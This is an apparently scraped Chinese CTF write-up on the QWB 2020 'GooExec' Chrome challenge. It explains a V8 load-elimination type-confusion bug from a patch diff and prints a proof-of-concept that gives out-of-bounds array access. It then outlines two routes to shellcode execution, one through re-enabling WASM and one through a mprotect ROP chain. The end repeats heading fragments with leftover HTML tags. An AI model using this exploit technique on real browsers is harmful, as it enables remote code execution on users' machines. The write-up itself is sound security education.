强网杯2020-GooExec Chrome Pwn漏洞分析与利用教学<\/h1>

1. 环境搭建<\/h2>

1.1 题目环境<\/h3>

操作系统: Ubuntu 20.04<\/li>

Chrome启动命令:

.\/chrome --js-flags=--noexpose_wasm --no-sandbox
<\/code><\/pre>

--js-flags=--noexpose_wasm<\/code>: 关闭WASM功能，阻止使用WASM填写shellcode<\/li>
--no-sandbox<\/code>: 关闭沙箱<\/li>
<\/ul>
<\/li>
<\/ul>
1.2 题目下载<\/h3>

下载地址: https:\/\/github.com\/De4dCr0w\/Browser-pwn\/blob\/master\/Vulnerability%20analyze\/qwb2020-final-GOOexec%20%26%20Issue-799263\/file.7z<\/a><\/li>
<\/ul>
2. V8基础知识<\/h2>
2.1 V8数组元素类型<\/h3>
V8中数组元素有以下几种类型:<\/p>

PACKED_SMI_ELEMENTS<\/strong>: 小整数(Smi)<\/li>
PACKED_DOUBLE_ELEMENTS<\/strong>: 双精度浮点数<\/li>
PACKED_ELEMENTS<\/strong>: 常规元素(不能表示为Smi或双精度的值)<\/li>
<\/ol>
2.2 类型转换规则<\/h3>

转换只能从特定类型向更一般的类型进行<\/li>
一旦数组被标记为更一般的类型，就不能回到更特定的类型<\/li>
<\/ul>
示例代码:<\/p>
const<\/span> array<\/span> =<\/span> [1<\/span>, 2<\/span>, 3<\/span>]; \/\/ PACKED_SMI_ELEMENTS
<\/span><\/span><\/span><\/span>array<\/span>.push<\/span>(4.56<\/span>); \/\/ PACKED_DOUBLE_ELEMENTS
<\/span><\/span><\/span><\/span>array<\/span>.push<\/span>('x'<\/span>); \/\/ PACKED_ELEMENTS
<\/span><\/span><\/span><\/code><\/pre>2.3 PACKED到HOLEY类型转换<\/h3>
密集数组可以转换为稀疏数组:<\/p>
const<\/span> array<\/span> =<\/span> [1<\/span>, 2<\/span>, 3<\/span>, 4.56<\/span>, 'x'<\/span>]; \/\/ PACKED_ELEMENTS
<\/span><\/span><\/span><\/span>array<\/span>.length<\/span>; \/\/ 5
<\/span><\/span><\/span><\/span>array<\/span>[9<\/span>] =<\/span> 1<\/span>; \/\/ array[5]到array[8]现在是holes
<\/span><\/span><\/span>\/\/ 类型变为HOLEY_ELEMENTS
<\/span><\/span><\/span><\/code><\/pre>3. 漏洞分析<\/h2>
3.1 漏洞补丁<\/h3>
漏洞与Chromium Issue 799263相同，引入漏洞的补丁删除了state = state->KillMaps(alias_info, zone())<\/code>这行代码。<\/p>
补丁差异:<\/p>
diff --git a\/src\/compiler\/load-elimination.cc b\/src\/compiler\/load-elimination.cc
<\/span><\/span>index ff79da8c86..8effdd6e15 100644
<\/span><\/span>--- a\/src\/compiler\/load-elimination.cc
<\/span><\/span><\/span><\/span>+++ b\/src\/compiler\/load-elimination.cc
<\/span><\/span><\/span><\/span>@@ -866,8 +866,8 @@ Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
<\/span><\/span><\/span><\/span>     if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
<\/span><\/span>       object_maps.remove(source_map, zone());
<\/span><\/span>       object_maps.insert(target_map, zone());
<\/span><\/span>-      AliasStateInfo alias_info(state, object, source_map);
<\/span><\/span><\/span>-      state = state->KillMaps(alias_info, zone());
<\/span><\/span><\/span><\/span>+      \/\/ AliasStateInfo alias_info(state, object, source_map);
<\/span><\/span><\/span>+      \/\/ state = state->KillMaps(alias_info, zone());
<\/span><\/span><\/span><\/span>       state = state->SetMaps(object, object_maps, zone());
<\/span><\/span>     }
<\/span><\/span>   } else {
<\/span><\/span>@@ -892,7 +892,7 @@ Reduction LoadElimination::ReduceTransitionAndStoreElement(Node* node) {
<\/span><\/span><\/span><\/span>     if (state->LookupMaps(object, &object_maps)) {
<\/span><\/span>       object_maps.insert(double_map, zone());
<\/span><\/span>       object_maps.insert(fast_map, zone());
<\/span><\/span>-      state = state->KillMaps(object, zone());
<\/span><\/span><\/span><\/span>+      \/\/ state = state->KillMaps(object, zone());
<\/span><\/span><\/span><\/span>       state = state->SetMaps(object, object_maps, zone());
<\/span><\/span>     }
<\/span><\/span>     \/\/ Kill the elements as well.
<\/span><\/span><\/code><\/pre>3.2 漏洞原理<\/h3>

KillMaps<\/code>函数负责消除alias对象的map信息<\/li>
去除KillMaps<\/code>会导致本应没有map信息的一些node仍保留着信息<\/li>
在ReduceCheckMaps<\/code>函数中，残留的map信息可能导致maps.contains<\/code>错误地返回true<\/li>
这会导致错误地删除CheckMaps<\/code>节点，造成类型混淆<\/li>
<\/ul>
3.3 POC分析<\/h3>
function<\/span> foo<\/span>(a<\/span>, b<\/span>) {
<\/span><\/span>  let<\/span> tmp<\/span> =<\/span> {};
<\/span><\/span>  b<\/span>[0<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>  a<\/span>.length<\/span>;
<\/span><\/span>  for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> a<\/span>.length<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>    a<\/span>[i<\/span>] =<\/span> tmp<\/span>;
<\/span><\/span>  }
<\/span><\/span>  let<\/span> o<\/span> =<\/span> [1.1<\/span>];
<\/span><\/span>  b<\/span>[15<\/span>] =<\/span> 4.063<\/span>e<\/span>-<\/span>320<\/span>;
<\/span><\/span>  return<\/span> o<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>let<\/span> arr_addr_of<\/span> =<\/span> new<\/span> Array(1<\/span>);
<\/span><\/span>arr_addr_of<\/span>[0<\/span>] =<\/span> 'a'<\/span>;
<\/span><\/span>for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 10000<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>  eval(`var tmp_arr = [1.1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24];`<\/span>);
<\/span><\/span>  foo<\/span>(arr_addr_of<\/span>, [1.1<\/span>, 2<\/span>, 3<\/span>, 4<\/span>, 5<\/span>, 6<\/span>, 7<\/span>, 8<\/span>, 9<\/span>, 10<\/span>, 11<\/span>, 12<\/span>, 13<\/span>, 15<\/span>, 16<\/span>, 17<\/span>, 18<\/span>, 19<\/span>, 20<\/span>, 21<\/span>, 22<\/span>, 23<\/span>, 24<\/span>]);
<\/span><\/span>  foo<\/span>(tmp_arr<\/span>, [1.1<\/span>, 2<\/span>, 3<\/span>, 4<\/span>, 5<\/span>, 6<\/span>, 7<\/span>, 8<\/span>, 9<\/span>, 10<\/span>, 11<\/span>, 12<\/span>, 13<\/span>, 15<\/span>, 16<\/span>, 17<\/span>, 18<\/span>, 19<\/span>, 20<\/span>, 21<\/span>, 22<\/span>, 23<\/span>, 24<\/span>]);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>var<\/span> float_arr<\/span> =<\/span> [1.1<\/span>, 2<\/span>, 3<\/span>, 4<\/span>, 5<\/span>, 6<\/span>, 7<\/span>, 8<\/span>, 9<\/span>, 10<\/span>, 11<\/span>, 12<\/span>, 13<\/span>, 15<\/span>, 16<\/span>, 17<\/span>, 18<\/span>, 19<\/span>, 20<\/span>, 21<\/span>, 22<\/span>, 23<\/span>, 24<\/span>];
<\/span><\/span>var<\/span> oob_array<\/span> =<\/span> foo<\/span>(float_arr<\/span>, float_arr<\/span>, {});
<\/span><\/span>console<\/span>.log<\/span>(oob_array<\/span>.length<\/span>);
<\/span><\/span><\/code><\/pre>
a[0]=0<\/code>会传入arr_addr_of<\/code>(HOLEY_ELEMENTS)和tmp_arr<\/code>(PACKED_DOUBLE_ELEMENTS)<\/li>
优化编译时，浮点数组会被转化为对象数组(HOLEY_ELEMENTS)<\/li>
漏洞触发后，数组b被转化为对象数组，但访问仍按浮点数组类型进行<\/li>
由于指针压缩，浮点数组转对象数组后长度缩短一半，可以精准覆盖后面数组o的长度<\/li>
<\/ul>
4. 漏洞利用<\/h2>
4.1 利用思路一: 重新开启WASM<\/h3>
步骤:<\/h4>


泄露V8 ELF基址<\/strong>:<\/p>

通过obj.constructor->code->text_addr<\/code>(Builtins_ArrayConstructor函数地址)泄露<\/li>
<\/ul>
<\/li>

查找并修改FLAG_expose_wasm<\/strong>:<\/p>

使用IDA查找"FLAG_expose_wasm"特征字符<\/li>
找到.data区中该变量的地址并修改为true<\/li>
<\/ul>
<\/li>

利用WASM执行shellcode<\/strong>:<\/p>

根据mark查找wasm_function对象地址<\/li>
通过wasm_function->shared_info->WasmExportedFunctionData(data)->instance+0x68<\/code>找到rwx区域<\/li>
将shellcode写入该区域<\/li>
<\/ul>
<\/li>
<\/ol>
注意事项:<\/h4>

Chrome运行时会有多个进程，需要确定哪个进程运行V8<\/li>
通常在第3个进程(libv8.so)中<\/li>
修改FLAG_expose_wasm只影响当前进程<\/li>
需要两个HTML文件: 一个开启WASM，一个利用WASM<\/li>
<\/ul>
4.2 利用思路二: ROP链利用<\/h3>
步骤:<\/h4>


获取libc基址<\/strong>:<\/p>

通过泄露printf .got表上的printf函数地址<\/li>
减去libc中printf的偏移得到libc基址<\/li>
<\/ul>
<\/li>

获取栈地址<\/strong>:<\/p>

查找libc中的environ<\/code>变量偏移<\/li>
environ<\/code>变量保存着栈地址<\/li>
<\/ul>
<\/li>

布置ROP链<\/strong>:<\/p>
add rsp 0x78; pop rbx; pop rbp; ret
<\/span><\/span>...
<\/span><\/span>pop rdi; ret shellcode_addr
<\/span><\/span>pop rsi; ret 0x1000
<\/span><\/span>pop rdx; ret 0x7
<\/span><\/span>mprotect_addr
<\/span><\/span>shellcode_addr
<\/span><\/span><\/code><\/pre><\/li>

执行shellcode<\/strong>:<\/p>

使用mprotect修改堆区域属性为rwx<\/li>
跳转到该区域执行shellcode<\/li>
<\/ul>
<\/li>
<\/ol>
注意事项:<\/h4>

Chrome会启动多个进程执行JS<\/li>
需要在带有--no-v8-untrusted-code-mitigations<\/code>标志的进程中查找ROP链<\/li>
可以先开启WASM创建对象，确定JS运行的进程<\/li>
<\/ul>
5. 参考链接<\/h2>

https:\/\/mem2019.github.io\/jekyll\/update\/2020\/09\/19\/QWB-GooExec.html<\/a><\/li>
https:\/\/github.com\/ray-cp\/browser_pwn\/tree\/master\/v8_pwn\/qwb2020-final-GOOexec_chromium<\/a><\/li>
https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=799263<\/a><\/li>
<\/ol>
6. 利用代码<\/h2>


漏洞利用一:<\/p>

exp-FLAG_expose_wasm.html<\/a><\/li>
exp-FLAG_expose_wasm1.html<\/a><\/li>
<\/ul>
<\/li>

漏洞利用二:<\/p>

exp.html<\/a><\/li>
<\/ul>
<\/li>
<\/ul>

强网杯2020-GooExec Chrome Pwn漏洞分析与利用教学<\/h1>

1. 环境搭建<\/h2>

1.2 题目下载<\/h3> 下载地址: https:\/\/github.com\/De4dCr0w\/Browser-pwn\/blob\/master\/Vulnerability%20analyze\/qwb2020-final-GOOexec%20%26%20Issue-799263\/file.7z<\/a><\/li> <\/ul> 2. V8基础知识<\/h2> 2.1 V8数组元素类型<\/h3> V8中数组元素有以下几种类型:<\/p>

2. V8基础知识<\/h2>

2.1 V8数组元素类型<\/h3> V8中数组元素有以下几种类型:<\/p>

2.2 类型转换规则<\/h3> 转换只能从特定类型向更一般的类型进行<\/li>

3. 漏洞分析<\/h2>

4. 漏洞利用<\/h2>

4.1 利用思路一: 重新开启WASM<\/h3>

4.2 利用思路二: ROP链利用<\/h3>

6. 利用代码<\/h2> 漏洞利用一:<\/p>

6. 利用代码<\/h2>

漏洞利用一:<\/p>

exp-FLAG_expose_wasm.html<\/a><\/li>
exp-FLAG_expose_wasm1.html<\/a><\/li> <\/ul> <\/li>

漏洞利用二:<\/p>

exp.html<\/a><\/li> <\/ul> <\/li> <\/ul>